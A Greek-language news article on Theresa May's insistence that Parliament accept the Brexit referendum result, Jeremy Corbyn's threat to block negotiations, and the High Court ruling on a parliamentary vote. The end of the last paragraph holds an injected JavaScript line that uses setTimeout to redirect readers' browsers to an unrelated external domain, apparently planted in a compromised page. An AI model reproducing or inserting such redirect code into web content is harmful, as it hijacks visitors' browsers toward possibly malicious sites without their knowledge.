Μέι: Το Kοινοβούλιο να αποδεχθεί τη νομιμότητα του δημοψηφίσματος

0
8

 

Το βρετανικό Κοινοβούλιο πρέπει να αποδεχθεί ότι η ψήφος των Βρετανών στο δημοψήφισμα για Brexit ήταν νόμιμη και πρέπει να επιτρέψει στην κυβέρνηση να συνεχίσει το έργο της στην ολοκλήρωση της διαδικασίας, τόνισε εκ νέου η πρωθυπουργός της Βρετανίας Τερέζα Μέι.

Από την πλευρά του ωστόσο, ο ηγέτης των Εργατικών Τζέρεμι Κόρμπιν διεμήνυσε ότι θα προσπαθήσει να εμποδίσει την έναρξη των διαπραγματεύσεων για την αποχώρηση της Βρετανίας από την Ευρωπαϊκή Ένωση στην περίπτωση που η κυβέρνηση δεν εξασφαλίσει την πρόσβαση στην ενιαία αγορά της Ευρωπαϊκής Ενωσης.

Πλήγμα ήταν για τη Μέι η απόφαση του Ανώτερου Δικαστηρίου του Λονδίνου να δώσει στη Βουλή δικαίωμα ψήφου επί της διαδικασίας του Brexit. Η κυβέρνηση ανακοίνωσε ότι θα προσφύγει κατά της απόφασης, αλλά αν αυτή επικυρωθεί από το Ανώτατο Δικαστήριο τον επόμενο μήνα και ακολουθηθεί η κοινοβουλευτική διαδικασία, το κυβερνών Συντηρητικό Κόμμα θα χρειαστεί να αγωνιστεί για να εξασφαλίσει την απαιτούμενη πλειοψηφία καθώς αρκετοί από τους βουλευτές του εμφανίζονται να έχουν ανησυχίες σχετικά με τους όρους του Brexit.

Η Μέι δηλώνει βέβαιη για την ανατροπή της απόφασης του Ανώτερου Δικαστηρίου και χθες κατά τη διάρκεια τηλεφωνικών της συνομιλιών με την Άνγκελα Μέρκελ και τον Φρανσουά Ολάντ, επέμεινε ότι το χρονοδιάγραμμα για την επίκληση του Αρθρου 50 της Συνθήκης της Λισαβόνας μέχρι το τέλος Μαρτίου παραμένει «αμετάβλητο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here